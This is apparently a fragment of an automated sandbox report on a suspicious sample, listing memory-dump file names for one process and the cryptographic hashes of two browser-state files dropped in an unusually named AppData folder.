memory/2548-1196-0x0000000004D20000-0x0000000004D2A000-memory.dmp
memory/2548-1197-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1198-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1199-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1200-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1201-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1202-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1205-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1204-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1203-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1206-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1207-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1208-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1209-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1210-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1211-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1212-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1213-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1215-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1214-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-1216-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-2004-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-2005-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-2008-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-2007-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-2006-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-3630-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-3642-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-3641-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-3640-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
memory/2548-3636-0x0000000006AB0000-0x0000000006AC0000-memory.dmp
C:\Users\Admin\AppData\Roaming\obligasteis\Network\Network Persistent State
| MD5 | 09a58e1e3eed712b5e97db45e2d51f1d |
| SHA1 | dba65d61106849871947a1fab59f52c0b6225de8 |
| SHA256 | 68505fceb9dff1e83a7f43191651285105ab529743003ec93a1366f846f6b59e |
| SHA512 | 098d8db507322c43d399963807d949748358f05c152e41e9bbfd7c8abc7e1136690cbde85ea978428c8b078ed72e1f37843847e6f97be753c7583c020589faea |
C:\Users\Admin\AppData\Roaming\obligasteis\Network\Network Persistent State~RFe58a3cd.TMP
| MD5 | 2800881c775077e1c4b6e06bf4676de4 |
| SHA1 | 2873631068c8b3b9495638c865915be822442c8b |
| SHA256 | 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974 |
| SHA512 | e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b |